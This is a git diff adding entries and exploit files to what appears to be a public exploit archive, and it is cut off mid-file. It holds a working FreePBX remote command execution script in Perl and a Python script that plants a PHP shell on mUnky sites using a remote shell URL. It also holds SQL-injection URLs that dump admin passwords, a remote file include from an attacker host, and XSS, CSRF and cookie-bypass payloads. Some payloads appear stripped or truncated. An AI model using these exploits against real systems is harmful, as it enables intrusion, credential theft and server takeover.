diff --git a/files.csv b/files.csv index bb9375817..2e2b32022 100755 --- a/files.csv +++ b/files.csv @@ -24493,7 +24493,7 @@ id,file,description,date,author,platform,type,port 27422,platforms/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 Post.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 Index.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0 -27425,platforms/linux/local/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,local,0 +27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,dos,0 27426,platforms/linux/local/27426.txt,"Zoo 2.10 Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,local,0 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.PHP Cross-Site Scripting Vulnerability",2006-03-16,Soot,php,webapps,0 27428,platforms/hardware/remote/27428.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-08,metasploit,hardware,remote,0 @@ -28989,8 +28989,10 @@ id,file,description,date,author,platform,type,port 32208,platforms/multiple/dos/32208.txt,"Oracle VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0 32209,platforms/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow",2014-03-12,metasploit,windows,remote,20171 32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow",2014-03-12,metasploit,windows,remote,20111 +32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Multiple Vulnerabilities (CSRF/Blind SQL Injection)",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 (Data.aspx, value param) - Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0, 6.0 RC, 6.0.0 GA (browse.php, file param) - Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 +32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 32215,platforms/php/webapps/32215.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS search.php key Parameter XSS",2008-08-09,Lostmon,php,webapps,0 32216,platforms/php/webapps/32216.txt,"RMSOFT Downloads Plus (rmdp) 1.5/1.7 Module for XOOPS down.php id Parameter XSS",2008-08-09,Lostmon,php,webapps,0 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 Multiple Remote File Include Vulnerabilities",2008-08-08,"Rohit Bansal",php,webapps,0 @@ -29001,6 +29003,7 @@ id,file,description,date,author,platform,type,port 32222,platforms/multiple/dos/32222.rb,"Ruby <= 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS",2008-08-11,"Keita Yamaguchi",multiple,dos,0 32223,platforms/multiple/remote/32223.rb,"Ruby <= 1.9 dl Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",multiple,remote,0 32224,platforms/multiple/remote/32224.rb,"Ruby <= 1.9 Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",multiple,remote,0 +32225,platforms/linux/remote/32225.txt,"Vim 'mch_expand_wildcards()' - Heap Based Buffer Overflow Vulnerability",2005-01-29,"Brian Hirt",linux,remote,0 32226,platforms/php/webapps/32226.txt,"Datafeed Studio 'patch.php' Remote File Include Vulnerability",2008-08-12,"Bug Researchers Group",php,webapps,0 32227,platforms/php/webapps/32227.txt,"Datafeed Studio 1.6.2 'search.php' Cross-Site Scripting Vulnerability",2008-08-12,"Bug Researchers Group",php,webapps,0 32228,platforms/linux/remote/32228.xml,"Bugzilla <= 3.1.4 '--attach_path' Directory Traversal Vulnerability",2008-08-12,"ilja van sprundel",linux,remote,0 @@ -29012,3 +29015,34 @@ id,file,description,date,author,platform,type,port 32234,platforms/php/webapps/32234.txt,"Meet#Web 0.8 RegForm.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 32235,platforms/php/webapps/32235.txt,"Meet#Web 0.8 RegResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 RegRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross Site Scripting",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 +32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 +32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 +32241,platforms/php/webapps/32241.txt,"PHP Realty 'dpage.php' SQL Injection Vulnerability",2008-08-13,CraCkEr,php,webapps,0 +32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 'readmore.php' SQL Injection Vulnerability",2008-08-13,Rake,php,webapps,0 +32243,platforms/php/webapps/32243.txt,"Nukeviet 2.0 'admin/login.php' Cookie Authentication Bypass Vulnerability",2008-08-13,Ciph3r,php,webapps,0 +32244,platforms/php/webapps/32244.txt,"YapBB 1.2 'class_yapbbcooker.php' Remote File Include Vulnerability",2008-08-13,CraCkEr,php,webapps,0 +32245,platforms/php/webapps/32245.txt,"Nortel Networks SRG V16 modules.php module Parameter XSS",2008-08-13,CraCkEr,php,webapps,0 +32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 +32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 +32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 Invalid URI Format String Vulnerability",2008-08-13,"Aaron Grattafiori",linux,dos,0 +32249,platforms/jsp/webapps/32249.txt,"Openfire <= 3.5.2 'login.jsp' Cross-Site Scripting Vulnerability",2008-08-14,"Daniel Henninger",jsp,webapps,0 +32250,platforms/php/webapps/32250.py,"mUnky 0.01'index.php' Remote Code Execution Vulnerability",2008-08-15,IRCRASH,php,webapps,0 +32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 'id' Parameter Local File Include Vulnerability",2008-08-15,Lostmon,php,webapps,0 +32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 administrator/popups/index3pop.php mosConfig_sitename Parameter XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0 +32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 mambots/editors/mostlyce/ .. /php/connector.php Query String XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0 +32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting Vulnerability",2008-08-15,Dr.Crash,php,webapps,0 +32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 'forum/neu.asp' SQL Injection Vulnerability",2008-08-15,U238,asp,webapps,0 +32256,platforms/windows/dos/32256.py,"Ipswitch <= 8.0 WS_FTP Client Format String Vulnerability",2008-08-17,securfrog,windows,dos,0 +32257,platforms/php/webapps/32257.txt,"PromoProducts 'view_product.php' Multiple SQL Injection Vulnerabilities",2008-08-15,baltazar,php,webapps,0 +32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 'awstats.pl' Cross-Site Scripting Vulnerability",2008-08-18,"Morgan Todd",cgi,webapps,0 +32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32260,platforms/php/webapps/32260.txt,"Freeway 1.4.1.171 french/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0 +32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32267,platforms/php/webapps/32267.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/card1.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/loginbox.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/whos_online.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 templates/Freeway/mainpage_modules/mainpage.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 diff --git a/platforms/asp/webapps/32255.txt b/platforms/asp/webapps/32255.txt new file mode 100755 index 000000000..132a56098 --- /dev/null +++ b/platforms/asp/webapps/32255.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30712/info + +fipsCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +fipsCMS 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/fipsCMS/forum/neu.asp?kat=1+union+select+0,pw_admin+from+config \ No newline at end of file diff --git a/platforms/cgi/webapps/32258.txt b/platforms/cgi/webapps/32258.txt new file mode 100755 index 000000000..57b84711f --- /dev/null +++ b/platforms/cgi/webapps/32258.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30730/info + +AWStats is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +AWStats 6.8 is vulnerable; other versions may also be affected. + +http://www.example.com/awstats/awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)// \ No newline at end of file diff --git a/platforms/hardware/webapps/32237.txt b/platforms/hardware/webapps/32237.txt new file mode 100755 index 000000000..2326f2adc --- /dev/null +++ b/platforms/hardware/webapps/32237.txt @@ -0,0 +1,55 @@ +# Exploit Title: Ubee EVW3200 - Multiple Persistent Cross Site Scripting + +# Google Dork: N/A + +# Date: 02-03-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://www.ubeeinteractive.com/ + +# Software Link: +http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20 + +# Version: All + +# Tested on: N/A + +# CVE : N/A + +# + +## Description: + +# + +# The SSID and Device name settings in the wireless configuration do not +sanitize their input. + +# + +# The VPN Tunnel name is also vulnerable for persistent XSS + +# + +## PoC: + +# + +# Entering the following payload in one of these fields will execute +javascript: + +# + +# "> or "> + +# + +# + +# More information can be found at: +http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/ + + + diff --git a/platforms/hardware/webapps/32238.txt b/platforms/hardware/webapps/32238.txt new file mode 100755 index 000000000..cbb04ca93 --- /dev/null +++ b/platforms/hardware/webapps/32238.txt @@ -0,0 +1,64 @@ +# Exploit Title: Ubee EVW3200 - Multiple Cross Site Request Forgery + +# Google Dork: N/A + +# Date: 02-03-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://www.ubeeinteractive.com/ + +# Software Link: +http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20 + +# Version: All + +# Tested on: N/A + +# CVE : N/A + +# + +## Description: + +# + +# The Ubee ECV3200 does not use Anti CSRF tokens in any of its forms. + +# + +## PoC: + +# + +#
+ +# + +#
+ +# + +# + +# + +# + +#
The payload has been executed....
+ +# + +# + +# + +# More information can be found at: +http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/ + diff --git a/platforms/jsp/webapps/32249.txt b/platforms/jsp/webapps/32249.txt new file mode 100755 index 000000000..afecbed1e --- /dev/null +++ b/platforms/jsp/webapps/32249.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30696/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.5.2 is vulnerable; prior versions are also affected. + +http://www.example.com/login.jsp?url=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%22hi%22)%3C/script%3E \ No newline at end of file diff --git a/platforms/linux/local/27425.txt b/platforms/linux/dos/27425.txt similarity index 100% rename from platforms/linux/local/27425.txt rename to platforms/linux/dos/27425.txt diff --git a/platforms/linux/dos/32248.txt b/platforms/linux/dos/32248.txt new file mode 100755 index 000000000..bd83a536a --- /dev/null +++ b/platforms/linux/dos/32248.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/30690/info + +Yelp is prone to a remote format-string vulnerability because the application fails to properly sanitize user-supplied input before including it in the format-specifier argument of a formatted-printing function. + +A remote attacker may exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts may cause denial-of-service conditions. + +Yelp 2.23.1 is vulnerable; other versions may also be affected. + +ftp://%08x.%08x.%08x.%08x.%08x.%08x +%x%x%x%x%x%x:// +%08x%08x \ No newline at end of file diff --git a/platforms/linux/remote/32225.txt b/platforms/linux/remote/32225.txt new file mode 100755 index 000000000..0502015ea --- /dev/null +++ b/platforms/linux/remote/32225.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30648/info + +Vim is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. + +An attacker may exploit this issue to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will likely result in denial-of-service conditions. + +This issue affects Vim 6.2.429 through 6.3.058. + +http://www.exploit-db.com/sploits/32225.zip \ No newline at end of file diff --git a/platforms/php/webapps/32211.txt b/platforms/php/webapps/32211.txt new file mode 100755 index 000000000..eb41a1ec7 --- /dev/null +++ b/platforms/php/webapps/32211.txt @@ -0,0 +1,58 @@ +[+] Author: TUNISIAN CYBER +[+] Exploit Title: LuxCal v3.2.2 CSRF/Blind SQL Injection Vulnerabilities +[+] Date: 09-03-2014 +[+] Category: WebApp +[+] Tested on: KaliLinux/Windows 7 Pro +[+] CWE: CWE-352/CWE-89 +[+] Vendor: http://www.luxsoft.eu/ +[+] Friendly Sites: na3il.com,th3-creative.com +[+] Twitter: @TCYB3R + +1.OVERVIEW: +LuxCal v3.2.2 suffers from a CSRF and Blind SQL Injection Vulnerabilities. + +2.Version: +3.2.2 + +3.Background: +LuxCal is an innovative web based event calendar for home use and small businesses. +It is easy to setup and allows easy and fast management of your calendar events at home, +in the office, on business trips or when on holiday. LuxCal is feature rich, has been +designed for user-friendliness and will help you to make error-free data inputs. +The user interface colors are easy to customize. LuxCal is free "open source" software +released under the GNU General Public License +http://www.luxsoft.eu/index.php?pge=dtail + +4.Proof Of Concept: +CSRF: + +
+ + + + + +
+ + +Blind SQL Ijnection: +http://127.0.0.1/lux/rssfeed.php?cal=(select(0)from(select(sleep(0)))v)/*%27%2b(select(0)from(select(sleep(0)))v)%2b%27%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ +"SQL error. See 'logs/mysql.log'" + +5.Solution(s): +no contact from vendor + +6.TIME-LINE: +2014-07-03: Vulnerability was discovered. +2014-07-03: Contact with vendor. +2014-08-03: No reply. +2014-09-03: No reply. +2014-09-03: Vulnerability Published + + + +7.Greetings: +Xmax-tn +Xtech-set +N43il +Sec4ver,E4A Members \ No newline at end of file diff --git a/platforms/php/webapps/32214.pl b/platforms/php/webapps/32214.pl new file mode 100755 index 000000000..73346d718 --- /dev/null +++ b/platforms/php/webapps/32214.pl @@ -0,0 +1,85 @@ +#!/usr/bin/perl +use strict; +use warnings; +use IO::Socket::INET; + +# Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution +# Google Dork: n/a +# Date: 2/25/14 +# Exploit Author: @0x00string +# Vendor Homepage: http://www.freepbx.org/ +# Software Link: http://mirror.freepbx.org/freepbx-2.11.0.tar.gz +# Version: 2.11 tested working +# Tested on: Ubuntu 12.04, 13.10 +# CVE : CVE-2014-1903 + + +# References: +# http://seclists.org/bugtraq/2014/Feb/42 +# http://issues.freepbx.org/browse/FREEPBX-7123 +# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903 +# +# Developer Advisory: +# http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice + + + +# in /admin/config.php +# // handle special requests +# if (!isset($no_auth) && isset($_REQUEST['handler'])) { +# $module = isset($_REQUEST['module']) ? $_REQUEST['module'] : ''; +# $file = isset($_REQUEST['file']) ? $_REQUEST['file'] : ''; +# fileRequestHandler($_REQUEST['handler'], $module, $file); +# exit(); +# } + + +# in /admin/library/view.functions.php +# case 'api': +# if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) { +# $function = $_REQUEST['function']; +# $args = isset($_REQUEST['args'])?$_REQUEST['args']:''; +# +# //currently works for one arg functions, eventually need to clean this up to except more args +# $result = $function($args); +# $jr = json_encode($result); +# } else { +# $jr = json_encode(null); +# } +# header("Content-type: application/json"); +# echo $jr; +# break; + + +$| = 1; + +my $sock = new IO::Socket::INET ( + PeerHost => $ARGV[0], + PeerPort => '80', + Proto => 'tcp', +); +die "$!\n" unless $sock; +my $func = $ARGV[1]; +my $args = ""; +my $i = 0; +my $max = 1; +foreach(@ARGV) { + if ($i > 1) { + $args .= $_; + } + unless($i > (scalar(@ARGV) - 2)) { + $args .= "%20"; + } + $i++; +} +my $payload = "display=A&handler=api&file=A&module=A&function=" . $func . "&args=" . $args; +chomp($payload); +print "payload is " . $payload . "\n"; +my $packet = "GET http://" . $ARGV[0] . "/admin/config.php?" . $payload . "\r\n\r\n"; +my $size = $sock->send($packet); +shutdown($sock, 1); +my $resp; +$sock->recv($resp, 1024); +print $resp . "\n"; +$sock->close(); +exit(0); \ No newline at end of file diff --git a/platforms/php/webapps/32240.txt b/platforms/php/webapps/32240.txt new file mode 100755 index 000000000..0436bb8b7 --- /dev/null +++ b/platforms/php/webapps/32240.txt @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/30676/info + +Freeway is prone to multiple remote file-include and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +Freeway 1.4.1.171 is affected; other versions may also be vulnerable. + +1. Multiple Remote/Local File Include + +Example: + +... +$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:''; +... + +if($command!="") +{ +switch($command){ +... +case 'include_page': +require($HTTP_GET_VARS['include_page']); +break; +... + +http://www.example.com/[installdir]/admin/create_order_new.php=http://evilhost/info.php + +Local File Include vulnerability found in script includes/events_application_top.php + +2. Linked XSS vulnerability + +Example + +http://www.example.com/[installdir]/admin/search_links.php" diff --git a/platforms/php/webapps/32241.txt b/platforms/php/webapps/32241.txt new file mode 100755 index 000000000..673d5d346 --- /dev/null +++ b/platforms/php/webapps/32241.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/30678/info + +PHP Realty is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/path/dpage.php?docID=-1 UNION SELECT 1,2,concat(Username,0x3a,Password) FROM admin-- +http://www.example.com/path/dpage.php?docID=-9999+union+all+select+1,2,group_concat(Username,char(58),Password)v3n0m+from+admin-- \ No newline at end of file diff --git a/platforms/php/webapps/32242.txt b/platforms/php/webapps/32242.txt new file mode 100755 index 000000000..354899975 --- /dev/null +++ b/platforms/php/webapps/32242.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30680/info + +PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHP-Fusion 4.01 is vulnerable; other versions may also be affected. + +http://www.example.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/* \ No newline at end of file diff --git a/platforms/php/webapps/32243.txt b/platforms/php/webapps/32243.txt new file mode 100755 index 000000000..d55293416 --- /dev/null +++ b/platforms/php/webapps/32243.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30681/info + +Nukeviet is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication. + +Attackers can exploit this vulnerability to gain administrative access to the affected application. + +Nukeviet 2.0 Beta is vulnerable; other versions may also be affected. + +javascript:document.cookie = "admf=1; path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/32244.txt b/platforms/php/webapps/32244.txt new file mode 100755 index 000000000..ddf44feb5 --- /dev/null +++ b/platforms/php/webapps/32244.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30686/info + +YapBB is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. + +YapBB 1.2 Beta2 is vulnerable; other versions may also be affected. + +http://www.example.com/include/class_yapbbcooker.php?cfgIncludeDirectory=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32245.txt b/platforms/php/webapps/32245.txt new file mode 100755 index 000000000..6a242cb92 --- /dev/null +++ b/platforms/php/webapps/32245.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30687/info + +Navboard is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks. Exploits of the cross-site scripting issue may allow the attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Navboard 16 is vulnerable; other versions may also be affected. + +http://www.example.com/path/modules.php?module=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32246.txt b/platforms/php/webapps/32246.txt new file mode 100755 index 000000000..ed38c85e3 --- /dev/null +++ b/platforms/php/webapps/32246.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30687/info + +Navboard is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks. Exploits of the cross-site scripting issue may allow the attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Navboard 16 is vulnerable; other versions may also be affected. + +http://www.example.com/path/admin_modules.php?module=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/32247.txt b/platforms/php/webapps/32247.txt new file mode 100755 index 000000000..67808ff9e --- /dev/null +++ b/platforms/php/webapps/32247.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30687/info + +Navboard is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks. Exploits of the cross-site scripting issue may allow the attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Navboard 16 is vulnerable; other versions may also be affected. + +http://www.example.com/path/modules.php?module=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/32250.py b/platforms/php/webapps/32250.py new file mode 100755 index 000000000..5a2c9db23 --- /dev/null +++ b/platforms/php/webapps/32250.py @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/30705/info + +mUnky is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input. + +Exploiting this issue allows attackers to cause the application to execute arbitrary script code in the context of the application; other attacks are also possible. + +mport httplib,urllib + +site=raw_input('Site [Ex www.r3d.com]: ') + +path=raw_input('Path [Ex /munky]: ') + +shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ') + +print "[*]Powered by : R3d.W0rm - r3d.w0rm (at) yahoo (dot) com [email concealed]" + +conn=httplib.HTTPConnection(site) + +print "[*]Connected to " + site + +print "[*]Sending shell code ..." + +conn.request('GET',path + "/?zone=');fclose($fp);?>") + +print "[*]Running shell code ..." + +data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00') + +print "[*]Shell created" + +print "[*]" + site + path + '/r3d.w0rm.php' diff --git a/platforms/php/webapps/32251.txt b/platforms/php/webapps/32251.txt new file mode 100755 index 000000000..9cfe2a65f --- /dev/null +++ b/platforms/php/webapps/32251.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30707/info + +PHPizabi is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks. + +PHPizabi 0.848b C1 HFP3 is vulnerable; other versions may also be affected. + +http://www.example.com/phpizabi/index.php?L=admin.templates.edittemplate&id=../../../boot.ini \ No newline at end of file diff --git a/platforms/php/webapps/32252.txt b/platforms/php/webapps/32252.txt new file mode 100755 index 000000000..8780c2d33 --- /dev/null +++ b/platforms/php/webapps/32252.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30708/info + +Mambo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Mambo 4.6.2 is vulnerable; other versions may also be affected. + +http://www.example.com/administrator/popups/index3pop.php?mosConfig_sitename= \ No newline at end of file diff --git a/platforms/php/webapps/32253.txt b/platforms/php/webapps/32253.txt new file mode 100755 index 000000000..47ed7c121 --- /dev/null +++ b/platforms/php/webapps/32253.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30708/info + +Mambo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Mambo 4.6.2 is vulnerable; other versions may also be affected. + +http://www.example.com/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar= \ No newline at end of file diff --git a/platforms/php/webapps/32254.txt b/platforms/php/webapps/32254.txt new file mode 100755 index 000000000..973da89c1 --- /dev/null +++ b/platforms/php/webapps/32254.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30709/info + +FlexCMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +FlexCMS 2.5 is vulnerable; other versions may also be affected. + +http://www.example.com/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString= \ No newline at end of file diff --git a/platforms/php/webapps/32257.txt b/platforms/php/webapps/32257.txt new file mode 100755 index 000000000..2f8ec261c --- /dev/null +++ b/platforms/php/webapps/32257.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30725/info + +PromoProducts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/view_product.php?cat_id=6500&sub_cat=6508&product_id=-9999+union+all+select+1,concat(user_name,char(58),password),null,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user-- + +http://www.example.com/view_product.php?cat_id=155&sub_cat=-9999+union+all+select+1,2,3,4,5,6,7,concat(user_name,char(58),password),9,10,11,12,13,14,115,16,17,18,19,20,21,22,23,24,25,26+from+user-- \ No newline at end of file diff --git a/platforms/php/webapps/32259.txt b/platforms/php/webapps/32259.txt new file mode 100755 index 000000000..3c489750c --- /dev/null +++ b/platforms/php/webapps/32259.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30731/info + +Freeway is prone to multiple local file-include 